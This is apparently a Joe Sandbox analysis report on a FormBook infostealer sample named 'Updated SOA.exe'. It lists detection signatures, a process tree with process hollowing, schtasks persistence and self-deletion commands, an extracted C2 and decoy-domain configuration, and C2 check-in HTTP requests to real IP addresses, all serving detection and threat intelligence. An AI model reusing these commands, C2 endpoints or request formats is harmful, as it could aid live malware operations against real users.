Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Updated SOA.exe

Overview

General Information

Sample Name:Updated SOA.exe
Analysis ID:486924
MD5:08098c5ef23fb87af19a5adbdd31324b
SHA1:19645fc145feaa325c5cc765bc873075a0aa7512
SHA256:ab4676fc90e455da2127126bfbd1fd167328c79eda83f686ef71dd89266825f5
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Updated SOA.exe (PID: 1380 cmdline: 'C:\Users\user\Desktop\Updated SOA.exe' MD5: 08098C5EF23FB87AF19A5ADBDD31324B)
    • schtasks.exe (PID: 5548 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Updated SOA.exe (PID: 1968 cmdline: C:\Users\user\Desktop\Updated SOA.exe MD5: 08098C5EF23FB87AF19A5ADBDD31324B)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 4896 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6168 cmdline: /c del 'C:\Users\user\Desktop\Updated SOA.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.Updated SOA.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.Updated SOA.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.Updated SOA.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        7.2.Updated SOA.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.Updated SOA.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Updated SOA.exeVirustotal: Detection: 31%Perma Link
          Source: Updated SOA.exeReversingLabs: Detection: 24%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.Updated SOA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Updated SOA.exe.3bb6150.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Updated SOA.exe.3b99930.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\oydxFbGhGlh.exeReversingLabs: Detection: 24%
          Machine Learning detection for sampleShow sources
          Source: Updated SOA.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\oydxFbGhGlh.exeJoe Sandbox ML: detected
          Source: 7.2.Updated SOA.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Updated SOA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: Updated SOA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: Updated SOA.exe, 00000007.00000002.300264801.0000000000FD0000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: Updated SOA.exe, 00000007.00000002.300264801.0000000000FD0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Updated SOA.exe, 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, cmmon32.exe, 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Updated SOA.exe, cmmon32.exe

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 104.21.2.184:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 104.21.2.184:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 104.21.2.184:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49770 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49770 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49770 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49771 -> 185.53.177.12:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49771 -> 185.53.177.12:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49771 -> 185.53.177.12:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 185.33.94.22:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 185.33.94.22:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 185.33.94.22:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 34.102.136.180:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.starsspell.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.2.184 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sunshinefamilysupport.com
          Source: C:\Windows\explorer.exeNetwork Connect: 70.40.216.229 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thesewhitevvalls.com
          Source: C:\Windows\explorer.exeDomain query: www.loccssol.store
          Source: C:\Windows\explorer.exeNetwork Connect: 23.92.26.10 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.carts-amazon.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.12 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.emilfaucets.com
          Source: C:\Windows\explorer.exeDomain query: www.invetorsbank.com
          Source: C:\Windows\explorer.exeDomain query: www.kutahyaescortbayanlarim.xyz
          Source: C:\Windows\explorer.exeDomain query: www.brightlifeprochoice.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.33.94.22 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.169.11 80Jump to behavior
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.kutahyaescortbayanlarim.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.thesewhitevvalls.com/b2c0/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw++swUDkTm/7Z&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.carts-amazon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=KWX9NFx1Gr7EjrLRbP2Ue6172ayjYXgbpVpgMDrQRkbxhVzMYie83xsGqGgpFAioWvz0&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.kutahyaescortbayanlarim.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=Vx4H34AfvC8+5ufWQT1ywEaqK5CQ+nmgdM61680UbYEpJUiUIyjnXiODPkc5gWJA3z4C&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.emilfaucets.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=OHhY/R7K/8h4MegcVZK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFKSMy8PCBLbw&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.sunshinefamilysupport.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=uqZnad07QiGCKwdGYcwo9Lbmnd7wjNT/WYKGRVhSVOqBK78kk4TDY1HvjRJsoD1gaAbq&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.invetorsbank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=T/FvhneI6kXhrarG8DZpDikOenyRImYajqrPlFumj7GB2BrAWwUdaa1CHdljUEylHeGw&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.loccssol.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=iqPHNlAuEp+rWkrFhaEt134F/UvnRG9uU2uGhWM6L7rkNLvrOy7oDxfHgSZWSk7NT09j&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.brightlifeprochoice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=fiodKOJcDC+U41n6yUoUA/NOfrt4VaPFcyjK7goYzH96zQ9HGoFcrenwBQCzJ6xg1U1l&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.starsspell.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=ngE3zTEQZhYKSyvQI1JtRqVv6LVi69c0agGQYGihkwEIgq8iGc/2kBp4e4/I6lFanwA/&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.newstodayupdate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.53.177.12 185.53.177.12
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Sep 2021 00:20:55 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dallbwbbB0jG3QI%2FttpOEybBvqprjoPuNOtTsjrQcsjxHUo1%2BvUmm9DaZAAKmupQffulU4Vs%2BQDOCjdHDaYj%2B2wmEVe7Y9qZkCGHCRK4NG7pd4nuryOOQJSCr8TL9nmuiugD9crgI62gedrQXBY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 691f21673fcf699f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: Updated SOA.exe, 00000000.00000003.214355579.0000000005A43000.00000004.00000001.sdmpString found in binary or memory: http://en.wikipVl
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Updated SOA.exe, 00000000.00000003.216278371.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: Updated SOA.exe, 00000000.00000003.216278371.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com;
          Source: Updated SOA.exe, 00000000.00000003.216278371.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTCt
          Source: Updated SOA.exe, 00000000.00000003.216278371.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comalY
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Updated SOA.exe, 00000000.00000003.216278371.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: Updated SOA.exe, 00000000.00000003.216278371.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comyrl
          Source: Updated SOA.exe, 00000000.00000003.238317077.0000000005A3A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Updated SOA.exe, 00000000.00000003.221660173.0000000005A43000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: Updated SOA.exe, 00000000.00000003.220153841.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Updated SOA.exe, 00000000.00000003.220238801.0000000005A5E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: Updated SOA.exe, 00000000.00000003.220133959.0000000005A5E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/;
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Updated SOA.exe, 00000000.00000003.220238801.0000000005A5E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersPH
          Source: Updated SOA.exe, 00000000.00000003.221351612.0000000005A5E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersn
          Source: Updated SOA.exe, 00000000.00000003.220176204.0000000005A5E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersp
          Source: Updated SOA.exe, 00000000.00000003.221093141.0000000005A5E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers~
          Source: Updated SOA.exe, 00000000.00000003.238317077.0000000005A3A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
          Source: Updated SOA.exe, 00000000.00000003.221024966.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comB.TTF
          Source: Updated SOA.exe, 00000000.00000003.220744148.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: Updated SOA.exe, 00000000.00000003.220255868.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comMS
          Source: Updated SOA.exe, 00000000.00000003.220744148.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comT.TTF4l
          Source: Updated SOA.exe, 00000000.00000003.221660173.0000000005A43000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comW.TTF&li
          Source: Updated SOA.exe, 00000000.00000003.225620409.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaul
